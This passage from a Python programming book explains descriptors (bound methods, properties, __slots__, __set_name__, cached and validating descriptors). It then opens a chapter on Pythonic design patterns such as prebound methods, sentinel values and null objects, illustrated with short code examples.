No matter where you started with object-oriented programming, you surely know what methods are. Methods are simply functions that take a reference to the object (self) as the first argument. While accessing methods with the object and the 'dot' notation, you call the function and provide the object reference as the first argument. What you need to know in the case of Python is that this is done through the __get__() implementation of the function object, which is a non-data descriptor. This helps in the transformation of obj.method(*args) to method(obj, *args). This might seem confusing at first, but take a look at how this works with the help of an example from Python's documentation:

import types

class Function(object):
    …
    def __get__(self, obj, objtype=None):
        """Simulate func_descr_get() in Objects/funcobject.c"""
        if obj is None:
            return self
        return types.MethodType(self, obj)

Thus, a bound method is returned when the function is accessed and its __get__() method is invoked.

The same happens for instance methods, class methods, and even static methods. If you invoke a static method as obj.method(*args), an automatic transformation takes place to call method(*args) with no binding. Similarly, when a class method is invoked as obj.method(*args), the automatic transformation calls method(type(obj), *args).

The Python documentation also provides samples describing how the static and class methods would have been implemented if they were written in pure Python rather than C. An example of a static method implementation would be as follows:

class StaticMethod(object):
    """Emulate PyStaticMethod_Type() in Objects/funcobject.c"""

    def __init__(self, f):
        self.f = f

    def __get__(self, obj, objtype=None):
        return self.f

Similarly, a possible Python implementation of a class method would be as follows:

class ClassMethod(object):
    """Emulate PyClassMethod_Type() in Objects/funcobject.c"""

    def __init__(self, f):
        self.f = f

    def __get__(self, obj, klass=None):
        if klass is None:
            klass = type(obj)
        def newfunc(*args):
            return self.f(klass, *args)
        return newfunc

We will dive into this feature in more detail later in this chapter.

In Python, the class methods are just static methods that take in the reference to the class as the first argument of the parameter list.

Writable data attributes

Sometimes, we might need to have modifiable properties, where deletion (using del myObj.property) or updation (using myObj.property = value) can be implemented by passing the getter and setter function objects to the constructor as arguments. These functions will be stored and executed when the attribute is updated or deleted through the __set__ or __delete__ methods discussed earlier. The following code illustrates the concept:

class System():
    def __init__(self):
        self._os = None

    def get_os(self):
        return self._os

    def set_os(self, os):
        if 'RHEL' not in os:
            raise AttributeError('We only support RHEL 7 and above')
        self._os = os
        print('{} installation complete!'.format(os))

    os = property(get_os, set_os)

>>> server = System()
>>> server.os = 'MacOS X'
…
AttributeError: We only support RHEL 7 and above
>>> server.os = 'RHEL 8'
RHEL 8 installation complete!

This uses a class attribute but works fine as a solution. However, since modifiable properties cannot be created with the @property decorator alone (a setter or deleter also has to be registered), we will define a custom Property class that charts out the getter, setter, and deleter functions, which can then be used as decorators:

class Property():
    def getter(self, fget):
        return type(self)(fget, self.fset, self.fdel, self.__doc__)

    def setter(self, fset):
        return type(self)(self.fget, fset, self.fdel, self.__doc__)

    def deleter(self, fdel):
        return type(self)(self.fget, self.fset, fdel, self.__doc__)

Now, you can use this class to achieve the following functionality:

class System():
    def __init__(self):
        self._os = None

    @property
    def os(self):
        return self._os

    @os.setter
    def os(self, os):
        if 'RHEL' not in os:
            raise AttributeError('We only support RHEL 7 and above')
        self._os = os
        print('{} installation complete!'.format(os))

This is a neater version of the previous implementation. The methods in the Property class act as decorators here – and what is it that they decorate? They wrap self – the property object reference.

Take the example of the setter decorator – it takes in the fset decorated method as a parameter and uses the constructor to create a new property object. The functions that are not passed as arguments – fget and fdel – are also propagated to the new object. There you see the functional beauty of decorators – taking in an object and adding some functionality to it before returning it.

How Python uses descriptors internally

After all this, what do you think constitutes a good descriptor? It is simple, a Pythonic object. We believe that having a proper understanding of how Python internally uses descriptors will create an outlook for writing good descriptor implementations. In this section, we will dive into the common cases where the Python language makes use of descriptors for handling simple and complex internal logic, and some elegant descriptors that we have been unknowingly using in our day-to-day code.

Functions and methods

As discussed earlier, the most common use case for descriptors is when a function defined in a class has to be transformed into a method; the function object does this by implementing the __get__ method. Methods are functions whose first argument is self – a reference to the instance itself. Let us take a more in-depth illustration of this concept.

Consider a situation where we are defining something like the following:

class DemoClass:
    def demo_method(self, …):
        self.val = 10

This definition is also equivalent to the following:

class DemoClass:
    pass

def demo_method(demoClassObj, …):
    demoClassObj.val = 10

demo_method(DemoClass())

The simple difference is that the function is now created within the class itself and is bound to the object when the method is called like the following:

myObj = DemoClass()
myObj.demo_method(…)

What Python is essentially doing is something like this:

myObj = DemoClass()
DemoClass.demo_method(myObj, …)

Therefore, this is simply a syntactic conversion that Python internally takes care of. The way this is achieved is with the help of descriptors. Since the descriptor protocol is engaged before the method call, it invokes the __get__() method, where some transformations take place on the internal callable:

>>> def function(): pass
…
>>> function.__get__
<method-wrapper '__get__' of function object at 0x…>

Let us take this one step at a time. When an instance.method(…) statement is encountered, the first step is to resolve the instance.method part. For this, the __get__ method of the corresponding function object (the method attribute) is called, which binds the object with the callable.

The internal operations in Python will be clearer with the help of an example. Let us define a callable as a class member that can act as a function or an externally invocable method. We should then be able to use an instance of this class as a method or function in another class. Refer to the following snippet:

class Functor:
    def __init__(self, callsign):
        self.callsign = callsign

    def __call__(self, myObject, param1, param2):
        print(f"{self.callsign}: {myObject} invoked with {param1} and {param2}")

class Demo:
    myFunc = Functor("Calling Internally")

One thing to note here is that the __call__() method's self parameter is an instance of the Functor class, and not of the calling Demo class. The myObject argument is supposed to be an object of the Demo type. Now, from what we have discussed, the call on the class instance as well as the invocation of the method should be equivalent:

In [4]: myObject = Demo()
In [5]: Functor("Calling Externally")(myObject, "Argument1", "Argument2")
Calling Externally: <__main__.Demo object at 0x…> invoked with Argument1 and Argument2

In [7]: myObject.myFunc("Argument1", "Argument2")
---------------------------------------------------------------------------
TypeError                                 Traceback (most recent call last)
----> 1 myObject.myFunc("Argument1", "Argument2")
TypeError: __call__() missing 1 required positional argument: 'param2'

However, we only see the first one working, while the second option raises an error. This error arises since the arguments do not assume the correct positions. The self parameter is not respected here, and all the parameters get shifted. To fix this issue, the Functor class has to be made into a descriptor. What that will do is, on access of the attribute, invoke the __get__() method, in which the callable is bound to the object – the first parameter will thereby be taken care of. This will now look like the following:

from types import MethodType

class Functor:
    def __init__(self, callsign):
        self.callsign = callsign

    def __call__(self, myObject, param1, param2):
        print(f"{self.callsign}: {myObject} invoked with {param1} and {param2}")

    def __get__(self, myObject, owner):
        if myObject is None:
            return self
        return MethodType(self, myObject)

If you now execute the invocations in the two forms as discussed earlier, the results are the same, as expected:

>>> myObject = Demo()
>>> Functor("Calling Externally")(myObject, "Argument1", "Argument2")
Calling Externally: <__main__.Demo object at 0x…> invoked with Argument1 and Argument2
>>> myObject.myFunc("Argument1", "Argument2")
Calling Internally: <__main__.Demo object at 0x…> invoked with Argument1 and Argument2

So, what just happened? The trick here was to transform the callable class object into a method with the help of MethodType from the types module. Note that the first parameter in the MethodType signature should be a callable, which in this case is self – a reference to the Functor instance itself, since it implements the __call__ definition. The second parameter is the object to which this callable needs to be bound. This is similar to what Python's own function objects make use of, enabling them to work as methods despite being defined within a class.

This is an elegant and Pythonic way of defining callable objects. While defining a callable, remember that if you make it a descriptor, you can use them in classes and class attributes.

Built-in decorators for methods

Several decorators in the Python core library, as per the official documentation, have been created with the help of descriptors. Some of the common ones that you might frequently be using include property, classmethod, and staticmethod.

What we have seen in the previous sections is that when you access a descriptor directly from the class, it returns itself. Properties in Python are actually descriptors, so when we query one from the class, the property object is returned rather than its computed value.

>>> class Demo:
…     @property
…     def myProperty(self):
…         pass
…
>>> Demo.myProperty
<property object at 0x…>

Remember, when it comes to class methods, the descriptor's __get__ function ensures that the first parameter is a reference to the class, irrespective of whether it was called from an object or directly from the class. In the case of static methods, the binding that __get__() would normally establish for functions accepting self as the first argument is overridden, ensuring that no parameter is bound at all.
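To make this concrete, here is a minimal sketch – not the actual CPython implementation – of how staticmethod-like and classmethod-like behaviour can be expressed through __get__; the class and attribute names are illustrative:

from types import MethodType

class MyStaticMethod:
    """Simplified stand-in for staticmethod: __get__ performs no binding."""
    def __init__(self, func):
        self.func = func

    def __get__(self, obj, owner=None):
        return self.func              # returned as-is, no bound first argument

class MyClassMethod:
    """Simplified stand-in for classmethod: binds the callable to the class."""
    def __init__(self, func):
        self.func = func

    def __get__(self, obj, owner=None):
        owner = owner or type(obj)
        return MethodType(self.func, owner)   # first argument becomes the class

class Demo:
    greet = MyStaticMethod(lambda: "hello")
    which = MyClassMethod(lambda cls: cls.__name__)

print(Demo.greet())     # hello
print(Demo().which())   # Demo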

Slots

Elsewhere in the book, we have discussed how the __all__ variable can be used to decide which names are exposed when someone imports a module. In a similar declarative spirit, when we define __slots__ as an attribute of a class, it lists all the attributes that the class expects to store.

Why do we need such a feature? Say you are creating a class for clients to use, but do not want them to add any extra properties dynamically in the course of its usage. If one attempts to add additional attributes to an instance of a class in which __slots__ is defined, an AttributeError exception is raised. Therefore, you have just made the class static: the __dict__ attribute is not created for its instances, and attributes cannot be added dynamically.

This raises another question – if there is no __dict__, where are the attribute values retrieved from? The answer is descriptors. Every entry defined in __slots__ will have a descriptor that can persist and return its value when called:

class Car:
    __slots__ = ("make", "model")

    def __init__(self, make, model):
        self.make = make
        self.model = model

    def __repr__(self):
        return f"{self.__class__.__name__}({self.make}, {self.model})"
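As a quick illustration of the behaviour described above (the exact wording of the error message varies slightly across Python versions):

>>> car = Car("Tesla", "Model 3")
>>> car.year = 2021
Traceback (most recent call last):
  …
AttributeError: 'Car' object has no attribute 'year'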

This is interesting and useful in several scenarios that you might come across in production code. However, what we are compromising here is the dynamic nature of Python – hence, caution is advised.

Only use this feature, when you are absolutely certain that you want to create a static object and no dynamic attributes need to be added.

On the other hand, benefits of using this technique include reduction in memory usage for the objects as they operate on a fixed set of fields and avoid using a complete dictionary.

Implementing descriptors in decorators

Let us summarize the different aspects that we have discussed about descriptors and their use with decorators:

Firstly, we have seen how descriptors are used in Python to make functions behave as methods when they are defined inside a class. We have also seen cases where the __get__() interface method of the descriptor protocol is used to create decorators that adapt to the object they are called on.

So, the technique to adapt the decorator is simply to implement the __get__() method and make use of MethodType from the types module to convert the callable – here, the decorator being created – into a method bound to the object that is passed as the parameter to __get__().

Now, while creating such a decorator, we have to create it as an object and not as a function – functions are objects that already come with their own __get__() implementation, which quickly leads to confusion for the developer. The smart thing to do here is to use a class for creating the decorator.

Use classes for defining decorators and make them callable with the __get__ interface method implementation. Avoid using functions which are objects with their own __get__ methods.
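As a hedged sketch of this advice (the decorator name logged and the Service class are illustrative, not from the book), a class-based decorator that keeps working on methods could look like this:

from types import MethodType

class logged:
    """Class-based decorator that also implements __get__,
    so it still works when applied to methods."""
    def __init__(self, func):
        self.func = func

    def __call__(self, *args, **kwargs):
        print(f"calling {self.func.__name__}")
        return self.func(*args, **kwargs)

    def __get__(self, obj, owner=None):
        if obj is None:
            return self
        # bind the decorator itself to the instance, just as a function would be
        return MethodType(self, obj)

class Service:
    @logged
    def ping(self):
        return "pong"

print(Service().ping())   # prints "calling ping", then "pong"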

Best practices while using Python descriptors

When we are working with descriptors in our code, the methods of the descriptor protocol need to be implemented. The __get__ and __set__ interface methods are the key definitions that must be worked with. Their signatures look like the following:

__get__(self, obj, type=None) -> object
__set__(self, obj, value) -> None

The performance and clarity of your descriptor code depend upon how well you understand the components you are implementing. Some of the aspects to keep in mind with respect to the preceding signatures are as follows:

self is the descriptor instance that is being written.

obj is the object to which the descriptor needs to be bound.

type specifies the type of the object that is bound to the descriptor. Another point to be aware of is that the __set__() method does not require the type argument that was discussed earlier, since this method is called on the object itself and the type is inferred.

On the other hand, __get__(), as we have seen, can be invoked using the object as well as the class.

Descriptors are instantiated only once per class

Another key point to note here is that, just like class members, Python descriptors are instantiated once for each class – and all the instances of that particular class will be sharing the descriptor instance. This is a tricky fact, which if missed, can come back to haunt you later. Consider the following example of a classic mishap if you do not keep this in mind:

class SingleDigitNumber:
    def __init__(self):
        self.number = 0

    def __get__(self, myObj, type=None) -> object:
        return self.number

    def __set__(self, myObj, number) -> None:
        if int(number) != number or number > 9 or number < 0:
            raise AttributeError("Enter a valid 1-digit number")
        self.number = number

class Demo:
    number = SingleDigitNumber()

object_one = Demo()
object_two = Demo()

object_one.number = 8
print(object_one.number)
print(object_two.number)

object_three = Demo()
print(object_three.number)

Notice that we create a class Demo that has an attribute called number – a descriptor. The descriptor persists the value it takes in within itself. So, what issue do you foresee when this is run? It will not work as intended because we have created a class-level attribute that is shared across all instances. Let us execute the following:

>>> python descriptors.py
8
8
8

No matter whether an instance was created before or after the __set__ method is invoked, all the objects share the same value.

Now, how can we fix this? One option would be to persist the descriptor values for all the objects in a dictionary. This works because the myObj parameter passed to both the __get__ and __set__ methods is a reference to the current object, and can therefore serve as the key. Consider the following updated example:

class SingleDigitNumber:
    def __init__(self):
        self.number = {}

    def __get__(self, myObj, type=None) -> object:
        try:
            return self.number[myObj]
        except KeyError:
            return 0

    def __set__(self, myObj, number) -> None:
        if int(number) != number or number > 9 or number < 0:
            raise AttributeError("Enter a valid 1-digit number")
        self.number[myObj] = number

class Demo:
    number = SingleDigitNumber()

object_one = Demo()
object_two = Demo()
object_one.number = 8
print(object_one.number)
print(object_two.number)
object_three = Demo()
print(object_three.number)

When this updated code is executed, we see that the results are now correct and the code operates properly.

>>> python descriptors.py
8
0
0

There is one unforeseen disadvantage of this approach. The descriptor we defined stores a strong reference to each object within itself. When you destroy an object, a reference to it still exists inside the descriptor – this prevents the memory from being released by the garbage collector. An alternative would be to use weak references, so that deleted objects disappear from the dictionary, but weak references are not possible for every object type in Python. Instead, the proper way to approach this is simply not to store the values within the descriptor at all. The ideal location is the object the descriptor is bound to. Consider the following updated example:

class SingleDigitNumber:
    def __init__(self, number):
        self.number = number

    def __get__(self, myObj, type=None) -> object:
        return myObj.__dict__.get(self.number) or 0

    def __set__(self, myObj, number) -> None:
        myObj.__dict__[self.number] = number

class Demo:
    number = SingleDigitNumber("number")

object_one = Demo()
object_two = Demo()

object_one.number = 8
print(object_one.number)
print(object_two.number)
object_three = Demo()
print(object_three.number)

That works great. The value is now stored in the object's __dict__ attribute under the same name as the descriptor. However, there is still one small compromise that we are making – you have to explicitly specify the name of the descriptor as an argument while instantiating it:

number = SingleDigitNumber("number")

This works, but is not elegant or Pythonic. This time, remember the other, less frequently used interface method of the descriptor protocol – the __set_name__() method.

__set_name__(self, owner, name)

With this method, the name parameter is assigned automatically when the descriptor is created inside the owning class. The final updated example would look something like the following:

class SingleDigitNumber:
    def __set_name__(self, owner, prop_name):
        self.name = prop_name

    def __get__(self, myObj, type=None) -> object:
        return myObj.__dict__.get(self.name) or 0

    def __set__(self, myObj, number) -> None:
        myObj.__dict__[self.name] = number

class Demo:
    number = SingleDigitNumber()

object_one = Demo()
object_two = Demo()

object_one.number = 8
print(object_one.number)
print(object_two.number)

object_three = Demo()
print(object_three.number)

Executing the preceding code will still provide the desired results:

>>> python descriptors.py
8
0
0

Notice that we are now using the __set_name__() method instead of the __init__ method of the descriptor. There is no further need to explicitly pass the name of the descriptor while instantiating it. What you achieve is cleaner and more Pythonic.

Put descriptors at the class level

Remember that for descriptors to behave in a sane manner, you have to define them at the class level. Otherwise, Python will not call the __get__ and __set__ methods by itself. Let us take an example to see how this works. Assume that we have a descriptor DemoDescriptor that returns a constant value when accessed. The code would look like the following:

class Demo(object):
    value_y = DemoDescriptor(84)

    def __init__(self):
        self.value_x = DemoDescriptor(84)

>>> myObj = Demo()
>>> print("X is %s, Y is %s" % (myObj.value_x, myObj.value_y))
X is <__main__.DemoDescriptor object at 0x…>, Y is 84

It is evident from the preceding code that when the class-level descriptor is accessed, its __get__ method is automatically invoked. Accessing the instance-level descriptor does not trigger any such call, and simply returns the descriptor object itself.
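The DemoDescriptor class itself is left implicit by the book; a minimal version consistent with the output above could be the following sketch:

class DemoDescriptor:
    def __init__(self, constant):
        self.constant = constant

    def __get__(self, obj, owner=None):
        # returns the stored constant only when invoked via the descriptor protocol
        return self.constant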

Accessing descriptor methods

Descriptors have the interface methods of the descriptor protocol implemented; however, they are simply classes, and you can add additional methods to them. One great use case is implementing callback properties. As an example, let's say we want to send a notification or an email whenever the state of an object is altered, and we do not want to modify its class to do that. Let us look at that in the following code:

from weakref import WeakKeyDictionary

class CallbackProperty(object):
    """A property that alerts observers upon updates"""
    def __init__(self, default=None):
        self.default = default
        self.dataset = WeakKeyDictionary()
        self.callbacks = WeakKeyDictionary()

    def __get__(self, myObject, owner):
        if myObject is None:
            return self
        return self.dataset.get(myObject, self.default)

    def __set__(self, myObject, value):
        for callback in self.callbacks.get(myObject, []):
            # alert callback function of new value
            callback(value)
        self.dataset[myObject] = value

    def register_callback(self, myObject, callback):
        if myObject not in self.callbacks:
            self.callbacks[myObject] = []
        self.callbacks[myObject].append(callback)

class CreditCard(object):
    expense = CallbackProperty(0)

def limit_breach_alert(value):
    if value > 10000000:
        print("You have maxed out your credit card.")

>>> card = CreditCard()
>>> CreditCard.expense.register_callback(card, limit_breach_alert)
>>> card.expense = 20000000
You have maxed out your credit card.
>>> print("Balance is %s" % card.expense)
Balance is 20000000
>>> card.expense = 100
>>> print("Balance is %s" % card.expense)
Balance is 100

Why use Python descriptors?

Now, you know what Python descriptors are and how Python itself uses them to power some of its features, like methods and properties. You have also seen how to create a Python descriptor while avoiding some common pitfalls. Everything should be clear now, but you may still wonder why you should use them.

In my experience, I have known many advanced Python developers who have never used this feature and have never needed it. That is quite normal, because there are not many use cases where Python descriptors are strictly necessary. However, that does not mean that Python descriptors are just an academic topic for advanced users. There are still some good use cases that justify the cost of learning how to use them.

Lazy properties of descriptors

All that we have discussed up to this point in the chapter has been leading to this. Lazy properties – those whose values are not computed until they are specifically accessed – are the simplest use case for descriptors.

Let's take an example of a class Universe that houses a method called answer_to_life(), which returns a value after a lot of thinking:

import random, time

class Universe:
    def answer_to_life(self):
        time.sleep(5)   # Consider this thinking time.
        return 42

myUniverse = Universe()
print(myUniverse.answer_to_life())
print(myUniverse.answer_to_life())
print(myUniverse.answer_to_life())

Each invocation of this method returns the value only after 5 seconds. What we want here is a lazy property that avoids recomputing the value every time when the result is the same. Remember the cached properties using descriptors that we discussed in a previous section? That is what comes in handy here.

import random, time

class CachedProperty:
    def __init__(self, func):
        self.func = func
        self.fname = func.__name__

    def __get__(self, instance, type=None) -> object:
        instance.__dict__[self.fname] = self.func(instance)
        return instance.__dict__[self.fname]

class Universe:
    @CachedProperty
    def answer_to_life(self):
        time.sleep(5)
        return 42

myUniverse = Universe()
# Note: answer_to_life is now accessed as an attribute, not called.
print(myUniverse.answer_to_life)
print(myUniverse.answer_to_life)
print(myUniverse.answer_to_life)

We have now updated the code to use a non-data descriptor that stores both the function and the generated value for future use. For the first access, the __get__() of the descriptor is called; for every subsequent access, the value is retrieved directly from the instance's __dict__, thereby shaving off a ton of processing time.

Lazy properties only work with non-data descriptors. Data descriptors take precedence over the instance's __dict__, so the cached value would never be looked up and this trick is rendered useless.

Code in accordance with the D.R.Y. principle

We have already discussed the D.R.Y. (Don't Repeat Yourself) principle earlier, in the context of creating modular, non-duplicated code. Descriptors in Python present a useful toolset for creating code that is reusable and can be shared among different properties or classes.

Let us see an abstract example of a class that has four different properties; each property can be set to a specific integer only if it is a prime number. In all other cases, it is reset to zero. Assume that we have an is_prime() function that checks whether a number is prime, as sketched below.
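A minimal version of this assumed helper could look like the following:

def is_prime(number):
    """Return True if number is a prime number, False otherwise."""
    if number < 2:
        return False
    for divisor in range(2, int(number ** 0.5) + 1):
        if number % divisor == 0:
            return False
    return True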

class PrimeDeals:
    def __init__(self):
        self._prop_one = 0
        self._prop_two = 0
        self._prop_three = 0
        self._prop_four = 0

    @property
    def prop_one(self):
        return self._prop_one

    @prop_one.setter
    def prop_one(self, number):
        self._prop_one = number if is_prime(number) else 0

    @property
    def prop_two(self):
        return self._prop_two

    @prop_two.setter
    def prop_two(self, number):
        self._prop_two = number if is_prime(number) else 0

    @property
    def prop_three(self):
        return self._prop_three

    @prop_three.setter
    def prop_three(self, number):
        self._prop_three = number if is_prime(number) else 0

    @property
    def prop_four(self):
        return self._prop_four

    @prop_four.setter
    def prop_four(self, number):
        self._prop_four = number if is_prime(number) else 0

>>> deals = PrimeDeals()
>>> deals.prop_one = 7
>>> deals.prop_two = 4
>>> print(deals.prop_one)
7
>>> print(deals.prop_two)
0

Notice how much code is duplicated for each property that we defined here. Python is more about elegance, and this repeated code defeats the purpose. How can you make this code Pythonic? Consider using descriptors for defining the property behaviour in one common place. We can define a PrimeNumber descriptor that can then be used for all the properties. Check out the following code:

class PrimeNumber:
    def __set_name__(self, owner, fname):
        self.fname = fname

    def __get__(self, instance, type=None) -> object:
        return instance.__dict__.get(self.fname) or 0

    def __set__(self, instance, val) -> None:
        instance.__dict__[self.fname] = (val if is_prime(val) else 0)

class PrimeDeals:
    prop_one = PrimeNumber()
    prop_two = PrimeNumber()
    prop_three = PrimeNumber()
    prop_four = PrimeNumber()

>>> deals = PrimeDeals()
>>> deals.prop_one = 7
>>> deals.prop_two = 4
>>> print(deals.prop_one)
7
>>> print(deals.prop_two)
0

This code looks way more compact and more importantly, Pythonic – no duplicates and modular structure to incorporate future changes easily.

Conclusion

We have gone through how descriptors are used in Python to fuel up some of its more interesting features. Descriptors are quite useful when some behaviour needs to be shared among properties within a class or among multiple classes. Understanding them in detail will make us more conscious developers and writing Pythonic code comes naturally when we understand why things are implemented the way they are. Descriptors are one of the critical language features that constructs in Python use heavily. In the next chapter, we will be looking at the different ways we can apply Pythonic design patterns in order to create robust, extensible, and manageable application code.

Key takeaways

If the descriptor implements the __delete__ or __set__ methods, it is referred to as a data descriptor, and if it only implements the __get__ method, we call it a non-data descriptor.

The property() built-in creates a descriptor object that implements the descriptor protocol. Class methods are essentially static methods that additionally receive a reference to the class as the first argument of the parameter list.

While defining a callable, remember that if you make it a descriptor, you can use them in classes and class attributes.

Every entry defined in __slots__ will have a descriptor that can persist and return its value when called.

To make a read-only data descriptor, define both __get__() and __set__() with the __set__() raising an AttributeError when called.

Properties are just a particular case of descriptors which means that we can use descriptors for far more complex tasks.

Descriptors can help to create better decorators by making sure that they will be able to work correctly for class methods as well.

When it comes to class-based decorators, it is safe to always implement the __get__() method on them, thereby making them descriptors as well.

Python descriptors are instantiated only once for each class – and all the instances of that particular class will be sharing the descriptor instance.

The code of a descriptor tends to contain implementation detail rather than business logic.

Further reading

Jacob Zimmerman, Python Descriptors: Understanding and Using the Descriptor Protocol

CHAPTER 9 Pythonic Design and Architecture

“Design is not just what it looks like and feels like. Design is how it works.”

— Steve Jobs, Apple

Inspiration can often seem elusive and out of reach when you need it the most. Unfortunately, you often cannot call it a day when you're feeling uninspired or frustrated by your designs – or the lack thereof. Oftentimes, you are working on a strict deadline that's keeping you up late into the night, thinking – how can I make this design better?

Structure

In this chapter, we will be broadly covering the following topics:

Python specific design patterns

Architecture of Python applications

Event driven programming

Microservices architecture

Scaling Python applications

Application security guidelines

Peek into input validations

Objectives

Now that we have gone through most of the Pythonic constructs and best practices around the key language concepts, we can put the pieces together. When you start building an application, it is vital to design an appropriate architecture for it. Just as the most expensive materials will not make a building strong and timeless if the foundation is weak, only a robust architecture can ensure that a piece of software is built to last. Having learnt the concepts covered in this chapter, you will be able to do the following:

Understand and use design patterns coupled with the Python language.

Chart out scalable architectures in the design phase.

Differentiate the intricacies of event-based, microservice, and API architectures.

Build applications that focus equally on security as well as business logic.

Python specific design patterns

In software engineering, design patterns play a crucial role in delivering reusable solutions to the common problems faced in the software design domain. They are most often the culmination of idioms and best practices adopted by seasoned software engineers over the years. However, design patterns should only be considered templates for solving a problem with greater efficiency, rather than a final design directly implementable in code. Most of us, in our early years in computer science, have gone through the much-acclaimed book, "Design Patterns: Elements of Reusable Object-Oriented Software", also popularly known as the "Gang of Four" book. It covers several design patterns, agnostic of language, which build up the foundation for great software. Several resources describe how these can be applied to Python applications.

Python, as a language has evolved with several novel constructs and paradigms, compared to other OOP languages, which can make for awesome application design patterns. In this section, we will be discussing some of the design patterns that are more relevant to Python software development.

The global object pattern

Namespaces in Python are restricted to the scope of their modules. For example, two different modules can each define a function with the same name doing similar things, and the two remain isolated from each other. The loads() function in the pickle and json modules is one such example.

In the absence of this feature, conflicts would become commonplace. If you were developing a third-party module, you would have to know, or look up, every other module that might exist in the standard library or elsewhere. Every change would come with the risk of conflicting with other namespaces. In languages where this is a possibility, people generally resort to hacks such as adding suffixes, prefixes, or punctuation to define their pseudo namespaces. This would clearly have been nothing short of a disaster.

In Python, everything is an object. The Global Object pattern describes the conventions regarding objects defined and named at a module's global level. Broadly, there are two different classifications for the use of global objects:

Prebound methods: In this pattern, the module creates an object and the bound methods of the object are assigned to the global level names. You can then invoke these methods without having to locate the object.

Sentinel objects: The Python Standard Library and a few third-party modules define and access sentinels at the global level. It is not mandatory for a sentinel object to be defined globally, though – it could be an attribute of a class, or even private by convention.

Let us look at these in a bit more detail.

The prebound method pattern

This is a mechanism for defining callables at the global level that share their state with the help of a global object. Suppose you are creating a Python module that needs to define a few routines accessible from the module's global namespace; these routines will have to maintain a common or shared state during runtime.

The robust random module in Python is a good example of this. Even though you can use it to create custom Random objects, if you use the module out of the box, several routines, including the likes of random(), randint(), or choice(), are available from the module's global namespace without invoking them on any Random object.

So, how do these direct calls work under the hood? What happens is that the random module has already created an instance of its Random class and bound these methods to it, before making them available for direct use. The calls share their state via this automatically created object. If you are creating a module that needs to make such routines globally available, you need to do the following:

Create an instance of your class at the module's top level.

The instance's name should start with an underscore, which keeps it from being exposed to users and signals that it should not be messed around with.

Create and assign to the global namespace a bound copy of every intended method of the object.

This can be illustrated with the help of a custom random class like the one in the Standard Library:

from datetime import datetime as dt

class RandHex(object):
    def __init__(self):
        self.instantiate_seed(dt.now().microsecond % 255 + 1)

    def instantiate_seed(self, seedVal):
        self.random_seed = seedVal

    def get_random(self):
        self.random_seed, carry = divmod(self.random_seed, 2)
        if carry:
            self.random_seed ^= 0xb8
        return self.random_seed

# create internal instance
_instance = RandHex()

# Assign to the global namespace
random = _instance.get_random

Now, when the users want to use this functionality, they simply have to invoke the method in a stand-alone manner. However, all calls to these methods would have to share the same underlying object in secret, which the user does not have to manage or care about.
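For illustration, assuming the snippet above is saved as a module named randhex.py (the module name is hypothetical), a user would simply call the prebound method:

from randhex import random   # 'randhex' is the hypothetical module above

print(random())   # each call advances the hidden, shared _instance
print(random())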

It is important to exercise caution with these import-time instantiations if your class constructor opens DB connections, writes to files, or opens sockets. These could have side effects or cause conflicts when the internal object is created. To avoid this, you can move such work into a setup method and require users to call it before usage.

For all the lightweight libraries being created, the Prebound Method pattern provides an efficient and idiomatic way to make stateful module or class behaviour available at a global level.

There are several instances of this pattern if you go through how the Standard Library modules are implemented. Take, for example, the reprlib module, which exposes the repr method like this:

aRepr = Repr()
repr = aRepr.repr

Also, in the calendar module, the methods are exposed somewhat like the following:

cal = TextCalendar()
prcal = cal.pryear
prweek = cal.prweek
week = cal.formatweek
prmonth = cal.prmonth
month = cal.formatmonth
calendar = cal.formatyear

The Prebound Method pattern is used in several other parts of the Standard Library, including, but not limited to, the following:

_sysrand from the secrets module.

_global_log from the distutils.log module.

_semaphore_tracker from the multiprocessing.semaphore_tracker module, and _forkserver from the multiprocessing.forkserver module.


The sentinel object pattern

Life is easy for developers when the domain specifies a value for every type of data, whether it is names in a database or people's ages. Usually, when dealing with data in Python programs, the None value is used wherever values are missing or unspecified. Now consider a scenario where you are processing a dataset in which None is itself a valid value to be stored or processed. How, then, do you depict the missing values in this case? We use a sentinel object – a custom, unique object that indicates values that are unspecified or missing. In this section, we will be looking at the different mechanisms by which we can differentiate between genuinely useful information and placeholder values using the Sentinel Object pattern.

Sentinel value

A standard example of sentinel values that most Python developers have come across in the Standard Library is the find() method of string objects, as opposed to the stricter index() method, which does not use a sentinel. The find() method returns the index of the first occurrence of a search string if found, else it returns -1. The index() method, on the other hand, raises an exception when there is no match. Notice how the sentinel saves a line or two and appears cleaner in the following example:

The regular way:

try:
    indx = myStr.index(searchStr)
except:
    return

The Pythonic way:

ind = myStr.find(searchStr)
if ind == -1:
    return

The -1 is the sentinel value here, whose predefined special meaning is that it denotes a failed search. However, some programmer might just have decided to use negative indices for their string searches, and that would create potential confusion.

The concept of sentinel values has been used for a long time. However, modern-day Python would probably just have used None as the sentinel value, thereby avoiding a value that could double as an index into the string itself. Languages like Go, which return string values from such methods rather than references to them, rely on a specialized sentinel string to indicate a failed search and/or a missing value.

Null pointers

Those coming from a C++ or C background would be familiar with NULL pointers. This would be something that Pythonistas never had to care about as it is deemed to complicate the data model of the language.

In a Python namespace, every name holds a reference. A name either exists or it does not; if it exists, it refers to an object behind the scenes. Even when a name is not pointing to anything useful, it points to the None object, which has a valid reference in memory.

There are no NULL pointers in Python. Every name is always guaranteed to hold a valid address.

Hence, you will never see a segmentation fault in Python code in spite of the interpreter being implemented in C – an error which, in languages like C, usually means that somewhere you missed a check for NULL. All Python values, including None and False, are defined as objects and have valid addresses.

The null object pattern

Now that we have talked about null pointers, let's move on to discuss a pattern that has nothing to do with them. Null objects are sane and valid objects that can be used to depict values that are blank or nonexistent. A null object is a sentinel object.

Consider a scenario where we have several Soldier objects, where one soldier might have another Soldier as their Commander, but that may not always be the case in the hierarchy. Here, the Pythonic way to deal with these objects would be to assign None to the Commander field of those that do not have one.

If you now have a function to print the details of a soldier, the None sentinel object will need to be specifically checked before operating on the Commander object. Refer to the following example:

for sld in soldiers:
    if sld.commander is None:
        cmdr = 'Batallion Leader had no commander!'
    else:
        cmdr = sld.commander.get_name()
    print(sld.name, '-', cmdr)

You will have to do the same in every place where the commander attribute is accessed. The idea of this design pattern is to replace the usage of the None object with a custom object designed to indicate that no value exists, for example:

NO_COMMANDER = Soldier(name='no commander')

The Soldier objects can now have the NO_COMMANDER object wherever we tried assigning None before. The benefits of this approach would be as follows:

The sentinel value can be used and accessed just like other valid objects. So, there will be no need to handle the special case anymore using an if statement, since the code will run fine out of the box even for the sentinel object.

